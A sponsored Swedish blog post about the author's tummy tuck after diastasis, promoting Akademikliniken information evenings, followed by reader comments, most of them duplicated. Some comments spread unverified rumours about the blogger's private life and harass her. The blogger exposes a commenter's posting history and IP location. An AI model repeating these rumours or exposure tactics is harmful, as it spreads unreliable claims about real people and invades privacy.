Plastikoperationer, rätt eller fel? I samarbete med Akademikliniken

 

MG_0269 MG_0316

Foto: Linda Himsel

 Hej fina! Nu ska jag skriva några rader om plastikoperationer.

Det är ett ganska tabubelagt ämne som många tyvärr inte står för. Mycket hysch hysch och förutfattade meningar. Vissa förknippar det med ytlighet och vips, så  hamnar man i ”bimbo kategorin”  direkt, när man öppet delar med sig om vad man själv har gjort. 

MEN jag hamnade inte i den kategorin, utan fick en chock när TUSENTALS mammor hörde av sig och delade med sig om sina erfarenheter och bekymmer kring detta. Tankar, frågor, liknande situationer. 

Jag har alltså själv gjort en bukplastik. Innan jag gjorde det så sökte jag en massa information om just det. Utan större framgång faktiskt. Jag upplever att det är mycket ”hysch hysch” kring det. Många som inte vågar stå för vad dom gör/gjort. Vilket såklart är individuellt  och upp till var och en.Men lite synd ändå. Det finns hjälp att få. Det finns hjälp att ta till. 

Det bästa som har hänt mig är att bli mamma. Utan tvekan!

Efter min graviditet så fick jag en diasats. Alltså en delad bukmuskulatur. Innan jag själv fick reda på det så hade jag absolut INGEN aning om vad det var för någonting. Jag tränade och kämpade mig ner ifrån drygt 100kg. Då blev min diasats ett problem. Det blev det ett riktigt bekymmer för mig i just träningen. 

Jag kunde alltså inte träna som jag ville, i nästan alla övningar så behöver man en stark och fungerande bål. I mitt fall så kunde man inte träna tillbaka delningen. Det kan man göra ibland. Men efter många konsultationer så konstaterade man att det inte skulle gå. Jag försökte i TVÅ ÅR, innan jag fick det förklarat för mig av en läkare nere i Kalmar.

Här ska du få se före bilder på hur magen såg ut innan min operation som jag valde att göra i södra Sverige.

För min del så handlade det både om utsidan och insidan. Alltså både estetiskt och funktionellt.Men framförallt funktionellt. Musklerna kan jag givetvis inte visa dig. Men min ärrade, skrynkliga men vackra mamma-mage kan jag visa dig. image2 image4

På efter bilden så har det hunnit gå ca 3-4 månader. Jag har skyddat magen från sol (som du kan se på bilden). Jag hade då börjat rehabträna och sakta men säkert börjat ”komma tillbaka”.

Jag är lagad på både in och utsidan. Man har sytt ihop bukmusklerna, skurit bort den överflödiga huden och gjort en ny navel. Detta är en ganska stor och omfattande operation som kräver ganska lång rehab. 

 Denna operationen har jag aldrig ångrat. Den har hjälpt mig både fysiskt och psykiskt =)

 

my-martens-mage-efter2-650x975

Foto: Herman Caroan

Under våren har jag själv tänkt ta tag i några ovälkomna leverfläckar och ärr  som stört mig ett tag och söker därför information om hur jag kan bli av med dem. Det allra bästa sättet att få reda på så mycket som möjligt om det man är intresserad av är såklart att besöka någon informationsträff som en del kliniker anordnar.

I samarbete med Akademikliniken så kan jag berätta att under januari och februari arrangerar Akademikliniken informationskvällar i Stockholm, Göteborg och Malmö. Perfekt om man är lite nyfiken och har funderingar kring detta.

Träffarna är helt kostnadsfria och på dem berättar läkare, sjuksköterskor, plastikkirurger och hudterapeuter bl a om hur man kan behandla hudproblem, återskapa magen efter graviditet och förminska eller förstora brösten. Man får chansen att ställa en massa frågor =)

Jag tycker att det är helt fantastiskt att man kan göra så mycket som man faktiskt kan idag. Mitt tips och råd till dig är att verkligen tänka efter före. Gå på informationsträffar och även konsultation med läkare. Jag gick på MÅNGA konsultationer innan jag bestämde mig för vart jag skulle operera mig. 

Så om även du har funderingar eller är nyfiken på att veta mer tycker jag du ska anmäla dig till någon av Akademiklinikens informationsträffar.

Mer information om när, hur och var, samt  anmälningsformulär hittar du HÄR. och du får gärna ta med dig en vän. DET ÄR FÅ PLATSER KVAR, så först till kvarn om du är nyfiken =)

Kram på dig!

/ My Martens 

I Samarbete med akademikliniken. 

59 Komentarer

 1. Felmärkt samarbete IGEN! Hur pedagogiskt folk än försöker förklara för dig att du måste märka reklam och samarbeten korrekt så får du inte till det. Skiter du i det eller förstår du inte?
  Din stalker har lagt upp ytterligare ett blogginlägg om dig. Tankar kring det hon tar upp denna gång?

  • Maggis? Lisen? Anonym? Kärt barn har många namn. VARFÖR byter du namn? Varför låtsas du vara någon som du inte är? Här nedan visas ALLA DINA kommentarer från en period. Tankar kring ditt beteende? Är du köpt av Cam Cam? IP adressen visar Bromma. Hmm.. osar surt här! Är du möjligtvis en bloggkollega?
   Inlägget är korrekt markerat. Bloggbevakningen är en person som försöker göra sig ett namn genom att mobba, hänga ut och förtala andra människor. Jag har nog inte så mycket mer att säga om just det. Vänligen lämna mig bara ifred nu! Det räcker nu! / MY Martens
   ****************************************************************************************************************************************Här nedan kommer en dina övriga kommenterar, men du byter namn efter varje gång? Varför?
   Håller med. Skrev en liknande kommentar igår, inga påhopp och nämnde inga namn osv, men den godkände hon inte….
   Fick precis bekräftat i en annan blogg varför flera andra bloggtjejer tagit avstånd från dig. Du har tydligen bjudit ut dig till en gift flerbarnfar. Usch för sånt!
   Så lägligt att ha en hel klass med nya människor att utnyttja och manipulera. Stackars dem ?
   Varför vill du få det till att du inte har en aaaaniiing om vad folk menar när dem skriver om dina föredetta vänner? Flera av dessa vänner har ju tagit avstånd och är öppna med det. Kallar du dessa för vänner? Dom flesta skulle nog kalla det för föredetta vänner. Fattar du inte att ditt agerande i vänner frågan får dig att verka jäkligt blåst?
   Jag håller med dig om att är man vänner dom tycker olika eller om det uppstått ett missförstånd så talar man ut och rensar luften. I detta fall verkar det ju som om vännerna inte tycker att det är ett alternativ och därför går man ju anta att dom anser att dom har belägg för sina åsikter om dig och inte tycker du är värd att reda ut något med. Jag tror nog att du vet vad som orsakat detta, vilket rykte som ligger till grund. Om dina föredetta vänner inte vill höra vad du har att säga så tycket jag att du borde skriva ett blogginlägg där du berättar om vad som hänt ur ditt perspektiv. På så sätt kanske folk slutar spekulera, lyssna på rykten och dra slutsatser utifrån felaktiga hintar.
   Oj…jag förstår hur du tänker med att inte vilja såra barn. Tror dom flesta läsare har förstått att det handlar om antingen otrohet elle pengar. Du bekräftade precis det :S
   Nu har jag läst blogginlägget och vill gärna höra vad som du anser vara förtal eller iaf på gränsen till förtal? Jag är väl insatt i lagstiftningen och kan inte se något förtal. Visst förstår du väl att du precis gjorde samma misstag igen, du slår ifrån dig och skriker att det är skitsnack osv…ett tips är att antingen ge ett utförligt svar om vad som inte stämmer i det där blogginlägget eller då håller du tyst. Första förslaget är väl att föredra om du vill slippa mer spekulationer om hur vida du gör fel eller ej.
   Du har märkt senaste inläggen med att det handlar om samarbeten. Bra. Nu kanske det är på sin plats med en ursäkt till Bloggbevakning? Jag menar, du anklagade ju bloggaren där för att utsätta dig för förtal när hon ifrågasatte om huruvida du märkte upp samsrbeten eller inte…bland annat.
   Jodu offerkoftan är på väldigt ofta. Och återigen har du missat att inleda med att inlägget innehåller ett samarbete. Deg räcker inte med en tag under rubriken. När ska du fatta? Beteendet kommer att ge dig ett rejält bakslag och kommer att kosta dig massor. Du känns väldigt oseriös och jag är förvånad att något företag vill samarbeta med dig.
   Egen träning på betald arbetstid? Underbart isf ☺ Eller planerat du in så du hinner ett pass egen träning före eller efter jobbet?Din stalker har skrivit om dig igen ?
   Hon som du kallar stalker, Bloggbevakning, har skrivit ett stöttande inlägg om dig. Helt genomond är hon faktiskt inte.
   Är det inte dags nu att så att säga läggs koren på bordet och berätta din syn på saken? Ut med mejlet som du fått från en ”vän”. Tror faktiskt detta inte kommer att ta slut innan du gjör drt. Berätta vad som hänt, låt det storma rejält ett tag men jag lovar, du fixar det. När nyheten lagt sig blir det lugnt kring dig….och det behöver du.
   Nej detta är identitetkapning. Suck, din dumhet slutar aldrig förvåna. Läs på innan du börjar gasta!
   Dina offerkofteinlägg får sig en rejäl känga hos maggan idag. Synpunkter på det?
   Varför inte bara berätta sanningen så det blir ett slut på ryktesspridningen och allt annat du drabbats av?
   Vilda diskussioner om dig hos Bloggbevakning. Tror det finns typ 43 kommentarer under senaste inlägget om dig. Inet smickrande. Mobbing kanske?
   Du gastar om hat och mobbing men du ger aldrig något konkret exempel på VAD anmälningarna gäller eller VAD du anser vara mobbing. Du måste ju begripa att det spekuleras. Kommentarerna hos Bloggbevakning ger en ganska klar bild av att du får ligga som du har bäddat. Är det sanningen som skrivs där är det inte konstigt att vänner vänder dig ryggen. Om det är på något annat vis är det kanske dags att du lägger fram din sanning?
   Är lägenheten i källaren på huset? Ser jättemysigt ut om man bortser från grannarnas avloppsledningar som går uppe vid taket i din lägenhet. Blir du inte störd när grannarna spolar vatten? Jag vet ju vilket ljud som kommer från ledningarna då.
   Jag skrev ju att lägenheten ser mysig ut. Var det fel av mig att notera grannarnas avloppsledningar som går läns taket i din lägenhet och om du blir störd av det med tanke på att det låter när grannarna spolar?
   Min fråga var inte hat hot eller mobbing så varför svarar du som du gjorde?
   Ärlig?! Jag skrattar ihjäl mig!
   ”Stalkern” har tillägnat dig ännu ett blogginlägg. Tankar om det?
   Bloggbevakning. My menar att hon blir stalkad av den bloggen ?
   Ja alltså hon har ju endast hänvisat till det du själv har lagt ut på blogg och instagram. Jag följer er båda och jag har inte sett camcam lägga ut ett enda blogginlägg där hon skrivit om något annat än det du själv delat med dig av. Hon har ifrågasatt saker du har lagt ut men att ifrågasätta är inte samma sak som att ljuga. Eller?
   Den du menar är djävulen själv har inte skrivit ett ont ord om dig i sociala medier. Tycker inte du det är illa att kalla någon för djävulen själv? Du säger att du inte tänker sjunka lika lågt som dina föredetta vänner men i detta blogginlägg är det precis det du gör. Jag fattar att du inte kommer att godkänna denna kommentar och OM du gör det så är det för att komma med ett spydigt svar eller veka helt oförstående. Det är väldigt trist att du inte kan ta att läsarna ifrågasätter eller inte håller med dig du tappar i respekt känner jag.
   För avancerat ord för My

  • Men ärligt Maggi eller vem du är, har du inget liv? Hur FAN orkar du sitta o skriva en massa skräp…
   Håll dig till en annan bloggare, ni verkar vara av samma skrot o korn…

 2. Fin din son är i håret:) alla gör som dom vill. Blir du nöjd och glad av ett lyft så varför inte? MEN om våra ungdomar inte är nöjda med sig själva blir det svårt.
  Jag inser att vi har andra tider nu. Hänger faktiskt med vilket inte min farmor o mormor kanske gjorde. Försöker SE varför det är viktigt för ungdomar. Det finns de som har en för stor näsa , bröst, hängande ögon m.m vid väldigt tidig ålder.
  Då när min farmor va liten så fanns vara orden ” du duger dom du är” varpå hon gick hem o tänkte: Åh va härligt om man kunde trolla? Nä…
  Nu går de!! Så OM du har nåt som du tycker stör dig då finns möjligheten. MEN ALLA har den inte. DÄR har vi problem….

 3. Felmärkt samarbete IGEN! Hur pedagogiskt folk än försöker förklara för dig att du måste märka reklam och samarbeten korrekt så får du inte till det. Skiter du i det eller förstår du inte?

  Din stalker har lagt upp ytterligare ett blogginlägg om dig. Tankar kring det hon tar upp denna gång?

  • Maggis? Lisen? Anonym? Kärt barn har många namn. VARFÖR byter du namn? Varför låtsas du vara någon som du inte är? Här nedan visas ALLA DINA kommentarer från en period. Tankar kring ditt beteende? Är du köpt av Cam Cam? IP adressen visar Bromma. Hmm.. osar surt här! Är du möjligtvis en bloggkollega?

   Inlägget är korrekt markerat. Bloggbevakningen är en person som försöker göra sig ett namn genom att mobba, hänga ut och förtala andra människor. Jag har nog inte så mycket mer att säga om just det. Vänligen lämna mig bara ifred nu! Det räcker nu! / MY Martens

   ****************************************************************************************************************************************Här nedan kommer en dina övriga kommenterar, men du byter namn efter varje gång? Varför?

   Håller med. Skrev en liknande kommentar igår, inga påhopp och nämnde inga namn osv, men den godkände hon inte….

   Fick precis bekräftat i en annan blogg varför flera andra bloggtjejer tagit avstånd från dig. Du har tydligen bjudit ut dig till en gift flerbarnfar. Usch för sånt!

   Så lägligt att ha en hel klass med nya människor att utnyttja och manipulera. Stackars dem 🙁

   Varför vill du få det till att du inte har en aaaaniiing om vad folk menar när dem skriver om dina föredetta vänner? Flera av dessa vänner har ju tagit avstånd och är öppna med det. Kallar du dessa för vänner? Dom flesta skulle nog kalla det för föredetta vänner. Fattar du inte att ditt agerande i vänner frågan får dig att verka jäkligt blåst?

   Jag håller med dig om att är man vänner dom tycker olika eller om det uppstått ett missförstånd så talar man ut och rensar luften. I detta fall verkar det ju som om vännerna inte tycker att det är ett alternativ och därför går man ju anta att dom anser att dom har belägg för sina åsikter om dig och inte tycker du är värd att reda ut något med. Jag tror nog att du vet vad som orsakat detta, vilket rykte som ligger till grund. Om dina föredetta vänner inte vill höra vad du har att säga så tycket jag att du borde skriva ett blogginlägg där du berättar om vad som hänt ur ditt perspektiv. På så sätt kanske folk slutar spekulera, lyssna på rykten och dra slutsatser utifrån felaktiga hintar.

   Oj…jag förstår hur du tänker med att inte vilja såra barn. Tror dom flesta läsare har förstått att det handlar om antingen otrohet elle pengar. Du bekräftade precis det :S

   Nu har jag läst blogginlägget och vill gärna höra vad som du anser vara förtal eller iaf på gränsen till förtal? Jag är väl insatt i lagstiftningen och kan inte se något förtal. Visst förstår du väl att du precis gjorde samma misstag igen, du slår ifrån dig och skriker att det är skitsnack osv…ett tips är att antingen ge ett utförligt svar om vad som inte stämmer i det där blogginlägget eller då håller du tyst. Första förslaget är väl att föredra om du vill slippa mer spekulationer om hur vida du gör fel eller ej.

   Du har märkt senaste inläggen med att det handlar om samarbeten. Bra. Nu kanske det är på sin plats med en ursäkt till Bloggbevakning? Jag menar, du anklagade ju bloggaren där för att utsätta dig för förtal när hon ifrågasatte om huruvida du märkte upp samsrbeten eller inte…bland annat.

   Jodu offerkoftan är på väldigt ofta. Och återigen har du missat att inleda med att inlägget innehåller ett samarbete. Deg räcker inte med en tag under rubriken. När ska du fatta? Beteendet kommer att ge dig ett rejält bakslag och kommer att kosta dig massor. Du känns väldigt oseriös och jag är förvånad att något företag vill samarbeta med dig.

   Egen träning på betald arbetstid? Underbart isf ☺ Eller planerat du in så du hinner ett pass egen träning före eller efter jobbet?Din stalker har skrivit om dig igen 😉

   Hon som du kallar stalker, Bloggbevakning, har skrivit ett stöttande inlägg om dig. Helt genomond är hon faktiskt inte.

   Är det inte dags nu att så att säga läggs koren på bordet och berätta din syn på saken? Ut med mejlet som du fått från en ”vän”. Tror faktiskt detta inte kommer att ta slut innan du gjör drt. Berätta vad som hänt, låt det storma rejält ett tag men jag lovar, du fixar det. När nyheten lagt sig blir det lugnt kring dig….och det behöver du.

   Nej detta är identitetkapning. Suck, din dumhet slutar aldrig förvåna. Läs på innan du börjar gasta!

   Dina offerkofteinlägg får sig en rejäl känga hos maggan idag. Synpunkter på det?

   Varför inte bara berätta sanningen så det blir ett slut på ryktesspridningen och allt annat du drabbats av?
   Vilda diskussioner om dig hos Bloggbevakning. Tror det finns typ 43 kommentarer under senaste inlägget om dig. Inet smickrande. Mobbing kanske?
   Du gastar om hat och mobbing men du ger aldrig något konkret exempel på VAD anmälningarna gäller eller VAD du anser vara mobbing. Du måste ju begripa att det spekuleras. Kommentarerna hos Bloggbevakning ger en ganska klar bild av att du får ligga som du har bäddat. Är det sanningen som skrivs där är det inte konstigt att vänner vänder dig ryggen. Om det är på något annat vis är det kanske dags att du lägger fram din sanning?

   Är lägenheten i källaren på huset? Ser jättemysigt ut om man bortser från grannarnas avloppsledningar som går uppe vid taket i din lägenhet. Blir du inte störd när grannarna spolar vatten? Jag vet ju vilket ljud som kommer från ledningarna då.

   Jag skrev ju att lägenheten ser mysig ut. Var det fel av mig att notera grannarnas avloppsledningar som går läns taket i din lägenhet och om du blir störd av det med tanke på att det låter när grannarna spolar?
   Min fråga var inte hat hot eller mobbing så varför svarar du som du gjorde?

   Ärlig?! Jag skrattar ihjäl mig!

   ”Stalkern” har tillägnat dig ännu ett blogginlägg. Tankar om det?

   Bloggbevakning. My menar att hon blir stalkad av den bloggen 😂

   Ja alltså hon har ju endast hänvisat till det du själv har lagt ut på blogg och instagram. Jag följer er båda och jag har inte sett camcam lägga ut ett enda blogginlägg där hon skrivit om något annat än det du själv delat med dig av. Hon har ifrågasatt saker du har lagt ut men att ifrågasätta är inte samma sak som att ljuga. Eller?

   Den du menar är djävulen själv har inte skrivit ett ont ord om dig i sociala medier. Tycker inte du det är illa att kalla någon för djävulen själv? Du säger att du inte tänker sjunka lika lågt som dina föredetta vänner men i detta blogginlägg är det precis det du gör. Jag fattar att du inte kommer att godkänna denna kommentar och OM du gör det så är det för att komma med ett spydigt svar eller veka helt oförstående. Det är väldigt trist att du inte kan ta att läsarna ifrågasätter eller inte håller med dig du tappar i respekt känner jag.

   För avancerat ord för My

  • Men ärligt Maggi eller vem du är, har du inget liv? Hur FAN orkar du sitta o skriva en massa skräp…
   Håll dig till en annan bloggare, ni verkar vara av samma skrot o korn…

 4. Fin din son är i håret:) alla gör som dom vill. Blir du nöjd och glad av ett lyft så varför inte? MEN om våra ungdomar inte är nöjda med sig själva blir det svårt.

  Jag inser att vi har andra tider nu. Hänger faktiskt med vilket inte min farmor o mormor kanske gjorde. Försöker SE varför det är viktigt för ungdomar. Det finns de som har en för stor näsa , bröst, hängande ögon m.m vid väldigt tidig ålder.

  Då när min farmor va liten så fanns vara orden ” du duger dom du är” varpå hon gick hem o tänkte: Åh va härligt om man kunde trolla? Nä…

  Nu går de!! Så OM du har nåt som du tycker stör dig då finns möjligheten. MEN ALLA har den inte. DÄR har vi problem….

 5. Först och främst är det ju upp till var och en vad de hittar på med sin kropp.
  Jag tycker bara det är synd när de går till överdrift, och önskar att någon hade hunnit stoppa innan det blir för mycket… Läkarna borde ju själva säga stopp kan man ju tycka ibland, det känns ju som det blir nästan som en drog för vissa. Att har man fixat till något man varit missnöjd med så ser man genast någon annan ”skavank” och sen bara det rullar på.
  Det du gjorde med din mage förstår jag definitivt, och även andra som vill fixa till något som verkligen stör dem. Det är ju dessutom svårt att veta hur mycket något påverkar någon annans liv. Jag har själv haft ett stort ärr från naveln och ner sen jag var 20, vilket inte är något som stört mig… det tror jag dock att många tycker är rätt konstigt.

 6. Akademikliniken är såå bra! Jag har opererat mig hos dom i Stockholm. Men inte bukplastik…. Fast jag skulle vilja göra en sån oxå……. hm, får försöka spara ihop pengar.
  Jag håller med en utav tidigare kommentarerna här å har skrivit det förut.
  Din son är så himla fin i håret!
  Klipp inte av han det där fina…..

 7. Först och främst är det ju upp till var och en vad de hittar på med sin kropp.
  Jag tycker bara det är synd när de går till överdrift, och önskar att någon hade hunnit stoppa innan det blir för mycket… Läkarna borde ju själva säga stopp kan man ju tycka ibland, det känns ju som det blir nästan som en drog för vissa. Att har man fixat till något man varit missnöjd med så ser man genast någon annan ”skavank” och sen bara det rullar på.

  Det du gjorde med din mage förstår jag definitivt, och även andra som vill fixa till något som verkligen stör dem. Det är ju dessutom svårt att veta hur mycket något påverkar någon annans liv. Jag har själv haft ett stort ärr från naveln och ner sen jag var 20, vilket inte är något som stört mig… det tror jag dock att många tycker är rätt konstigt.

 8. Akademikliniken är såå bra! Jag har opererat mig hos dom i Stockholm. Men inte bukplastik…. Fast jag skulle vilja göra en sån oxå……. hm, får försöka spara ihop pengar.
  Jag håller med en utav tidigare kommentarerna här å har skrivit det förut.
  Din son är så himla fin i håret!
  Klipp inte av han det där fina…..

 9. Tycker man e bra som man e, men förstår ändå om man efter att blivit lämnad och bara har ett barn att man känner sig ledsen och vill få ordnat magen.Kan få in en knytnäve mellan mina bukmuskelplattor,usch, men har inte tänkt så mkt på de när de var samma gubbe o fem gravditeter….Förstår dej så väl här, har dotter som gick in i träningsanorexia i din situation, Inga lätta saker..

 10. Tycker man e bra som man e, men förstår ändå om man efter att blivit lämnad och bara har ett barn att man känner sig ledsen och vill få ordnat magen.Kan få in en knytnäve mellan mina bukmuskelplattor,usch, men har inte tänkt så mkt på de när de var samma gubbe o fem gravditeter….Förstår dej så väl här, har dotter som gick in i träningsanorexia i din situation, Inga lätta saker..

 11. Läser Elaine Eksvärds blogg. Där tar hon upp ’Bloggbevakning’. Så bra att där är fler som har fått upp ögonen på hur den människan skriver om andra.
  Krya på dig ? Nu har du väl ändå fått tillräckligt. Kram

 12. Läser Elaine Eksvärds blogg. Där tar hon upp ’Bloggbevakning’. Så bra att där är fler som har fått upp ögonen på hur den människan skriver om andra.
  Krya på dig 😄 Nu har du väl ändå fått tillräckligt. Kram

 13. Ifall du frågar mig , så är den ivriga illvilliga kommentatorn som så väl känner till dina tak-rör din fd vän MG.
  Hon verkar vara en mycket spännande personlighet ?

 14. Ifall du frågar mig , så är den ivriga illvilliga kommentatorn som så väl känner till dina tak-rör din fd vän MG.
  Hon verkar vara en mycket spännande personlighet 😱

 15. Men om du tyckte att magen var vacker varför tog du bort det ärrade då!? Det måste ju ha varit av estetiska skäl också då väl, av fåfänga. Inte för att det är fel med det och kan förstå att man vill ha en platt, slät mage och det är ju inget att hymla om, men annars kunde de ju bara sytt ihop musklerna då väl om de nu var delade och det besvärade? Fint med ärrade mammamagar tycker jag, som Therese Wickmans, hon skäms inte för att visa den, modigt och fint tycker jag. Men såklart fint med platta och släta magar också, snyggt. Kanske en del kör med att de har delade muskler när de vill operera sin mage plattare hehe som du säger hysch hysch så de inte ska kallas ytliga ? Men alla plastikoperationer handlar ju inte om yta och fåfänga, men det känns ändå som att det börjar gå för långt i skönhetsindustrin tycker jag, är kluven i frågan.

  • Jag tog inte bort något ärr?? Vad menar du? Jag lagade min bukmuskulatur. Dvd, inne i magen.
   För att kunna göra det så behöver all hud också tas bort. Googla på diastas så tror jag att du förstår.
   Så mycket djupare inne i kroppen kommer man nämligen inte ? Vad det gäller Therese så har vi pratat mycket om magen. Hon ville då göra precis samma operation som jag. Men av personliga själ hat hon väntat. Idag vet jag inte hur hon stället sig till det. Jag vet inte om hon har någon diastas, det behöver man bli undersökt för att ta reda på.
   För min fel, handlar det extremt mycket om funktion. Jag kunde tex inte sätta mig upp upp i sängen utan att ta hjälp av min armar, då magmusklerna var delade.
   Innan operation uppmätte man en diastas på 6.5 cm. Efter operation förstod man att det var ännu mer.
   Utan denna operation så hade jag fortfarande Varit fysiskt nedsatt. Min magmuskulaturen fungerade inte. Den var trasig, ”död”, utan kontakt.
   Men precis som du skriver så är ser SÅ många som av okunskap tror att det handlar om ytan? Precis som du.
   Diastas är vanligt. Men inte många som känner till det. Nu börjat barnmorskor, och vi PTs att informera kundens om vad det är. Har man en liten diastas på 2-3cm som inte går ihop efter graviditet. Då är det okay, det kan gå att med hjälp av anpassad träning förbättra.
   Min diastas var ovanligt stor. EFTER operationen fick jag ärr. Ingenting jag hade innan.
   Efter operationen la jag ytterligare två år på rehab träning. Idag fungerar magmusklerna och jag har för bara några månader sedan kunnat få full kontakt och börja träna ”på riktigt”, alltså även göra övningar så som tunga knäböj med skivstång, marklyft och annat där det krävs att man kan hålla ett stark båltryck och ha ett fungerande muskel engagemang. Detta var en lååååång historia kort ? fråga gärna om du undrar över något. Kram

 16. Men om du tyckte att magen var vacker varför tog du bort det ärrade då!? Det måste ju ha varit av estetiska skäl också då väl, av fåfänga. Inte för att det är fel med det och kan förstå att man vill ha en platt, slät mage och det är ju inget att hymla om, men annars kunde de ju bara sytt ihop musklerna då väl om de nu var delade och det besvärade? Fint med ärrade mammamagar tycker jag, som Therese Wickmans, hon skäms inte för att visa den, modigt och fint tycker jag. Men såklart fint med platta och släta magar också, snyggt. Kanske en del kör med att de har delade muskler när de vill operera sin mage plattare hehe som du säger hysch hysch så de inte ska kallas ytliga 😉 Men alla plastikoperationer handlar ju inte om yta och fåfänga, men det känns ändå som att det börjar gå för långt i skönhetsindustrin tycker jag, är kluven i frågan.

  • Jag tog inte bort något ärr?? Vad menar du? Jag lagade min bukmuskulatur. Dvd, inne i magen.

   För att kunna göra det så behöver all hud också tas bort. Googla på diastas så tror jag att du förstår.

   Så mycket djupare inne i kroppen kommer man nämligen inte 😊 Vad det gäller Therese så har vi pratat mycket om magen. Hon ville då göra precis samma operation som jag. Men av personliga själ hat hon väntat. Idag vet jag inte hur hon stället sig till det. Jag vet inte om hon har någon diastas, det behöver man bli undersökt för att ta reda på.

   För min fel, handlar det extremt mycket om funktion. Jag kunde tex inte sätta mig upp upp i sängen utan att ta hjälp av min armar, då magmusklerna var delade.

   Innan operation uppmätte man en diastas på 6.5 cm. Efter operation förstod man att det var ännu mer.

   Utan denna operation så hade jag fortfarande Varit fysiskt nedsatt. Min magmuskulaturen fungerade inte. Den var trasig, ”död”, utan kontakt.

   Men precis som du skriver så är ser SÅ många som av okunskap tror att det handlar om ytan😊 Precis som du.

   Diastas är vanligt. Men inte många som känner till det. Nu börjat barnmorskor, och vi PTs att informera kundens om vad det är. Har man en liten diastas på 2-3cm som inte går ihop efter graviditet. Då är det okay, det kan gå att med hjälp av anpassad träning förbättra.

   Min diastas var ovanligt stor. EFTER operationen fick jag ärr. Ingenting jag hade innan.

   Efter operationen la jag ytterligare två år på rehab träning. Idag fungerar magmusklerna och jag har för bara några månader sedan kunnat få full kontakt och börja träna ”på riktigt”, alltså även göra övningar så som tunga knäböj med skivstång, marklyft och annat där det krävs att man kan hålla ett stark båltryck och ha ett fungerande muskel engagemang. Detta var en lååååång historia kort 🙂 fråga gärna om du undrar över något. Kram

 17. Ja alltså du skrev ju själv din ärrade mammamage, den ser väl lite ärrad och skrynklig ut på bilderna, var den inte det alltså eller vad är det annars du visar upp på bilderna? Aha okej så de MÅSTE ta bort all hud på magen för att kunna göra operationen, visste inte det men då förstår jag, så det var inte alls för att få en snyggare mage då bara för funktion. Men ville Therese göra det för att få en snyggare mage då, samma operation, om hon inte hade diastas? Umgås ni förresten? Ja en sån operation kostar väl mycket. Oj så du kunde inte sätta dig upp utan ta hjälp av armar, men du kunde väl träna eller du tränade väl iaf en hel del även innan operation har man sett tidigare i din blogg och om man går tillbaka, men så skönt och bra då att du gjorde operationen. Jo vet att diastas är vanligt. Skrev du inte nyligen att du inte rehabtränade efter operation men börjat med det nu. Snällt att vi får fråga och att du orkar skriva långa utförliga svar. Hoppas du mår bättre nu också. Kram

 18. Ja alltså du skrev ju själv din ärrade mammamage, den ser väl lite ärrad och skrynklig ut på bilderna, var den inte det alltså eller vad är det annars du visar upp på bilderna? Aha okej så de MÅSTE ta bort all hud på magen för att kunna göra operationen, visste inte det men då förstår jag, så det var inte alls för att få en snyggare mage då bara för funktion. Men ville Therese göra det för att få en snyggare mage då, samma operation, om hon inte hade diastas? Umgås ni förresten? Ja en sån operation kostar väl mycket. Oj så du kunde inte sätta dig upp utan ta hjälp av armar, men du kunde väl träna eller du tränade väl iaf en hel del även innan operation har man sett tidigare i din blogg och om man går tillbaka, men så skönt och bra då att du gjorde operationen. Jo vet att diastas är vanligt. Skrev du inte nyligen att du inte rehabtränade efter operation men börjat med det nu. Snällt att vi får fråga och att du orkar skriva långa utförliga svar. Hoppas du mår bättre nu också. Kram

 19. Undrar om det är ett stort födelsemärke nedtill på magen, på ena fotot ? Eller ? Om det är ett födelsemärke så rekommenderar jag dig att få det borttaget, ser inte bra ut.
  Kanske oroar jag mig i onödan ?
  Kram

 20. Tycker det är helt och hållet upp till var och en vad man gör med sin kropp.
  Men…. en del ( INTE du !! ) borde titta sig i spegeln innan de gör nåt. För många ändrar på sig så de blir då inte vackrare. Men det ligger väl det i betraktarens ögon det med.
  Men du nämner bukoperation och leverfläckar. DET är ju saker som landstingen hjälper till med och då behöver man inte betala mer än sjukvårdskostnaden.
  Plastikkirurgi i övrigt får man väl avgöra själv och bekosta själv och det är som sagt upp till var och en.
  Men jag tycker att om man har nåt bekymmer med sin kropp så kan man först tala med sin egen läkare på vårdcentral/sjukhus, innan man själv börjar bekosta dyra operationer.

 21. Undrar om det är ett stort födelsemärke nedtill på magen, på ena fotot ? Eller ? Om det är ett födelsemärke så rekommenderar jag dig att få det borttaget, ser inte bra ut.
  Kanske oroar jag mig i onödan ?
  Kram

 22. Tycker det är helt och hållet upp till var och en vad man gör med sin kropp.
  Men…. en del ( INTE du !! ) borde titta sig i spegeln innan de gör nåt. För många ändrar på sig så de blir då inte vackrare. Men det ligger väl det i betraktarens ögon det med.
  Men du nämner bukoperation och leverfläckar. DET är ju saker som landstingen hjälper till med och då behöver man inte betala mer än sjukvårdskostnaden.
  Plastikkirurgi i övrigt får man väl avgöra själv och bekosta själv och det är som sagt upp till var och en.
  Men jag tycker att om man har nåt bekymmer med sin kropp så kan man först tala med sin egen läkare på vårdcentral/sjukhus, innan man själv börjar bekosta dyra operationer.

 23. Har 1000 födelsemärke jag behöver ta bort. Vissa växer och ändrar form. Vet inte vart man vänder sig för att få bedömning och hjälp???? Hade hoppats på tips här i kommentarerna!

 24. Har 1000 födelsemärke jag behöver ta bort. Vissa växer och ändrar form. Vet inte vart man vänder sig för att få bedömning och hjälp???? Hade hoppats på tips här i kommentarerna!

 25. Hej My
  Håller med dig helt i ditt inlägg.
  Jag har själv gjort både bröst och bukplastik.
  Det jag förvånas över i din annars helt ärliga blogg är dina bröst. När du la upp bilder på din blogg (trogen följare:) såg man klart och tydligt ärr under brösten. Varför står du inte för detta? Jag får inte alls ihop det. kram

 26. Hej My
  Håller med dig helt i ditt inlägg.
  Jag har själv gjort både bröst och bukplastik.
  Det jag förvånas över i din annars helt ärliga blogg är dina bröst. När du la upp bilder på din blogg (trogen följare:) såg man klart och tydligt ärr under brösten. Varför står du inte för detta? Jag får inte alls ihop det. kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

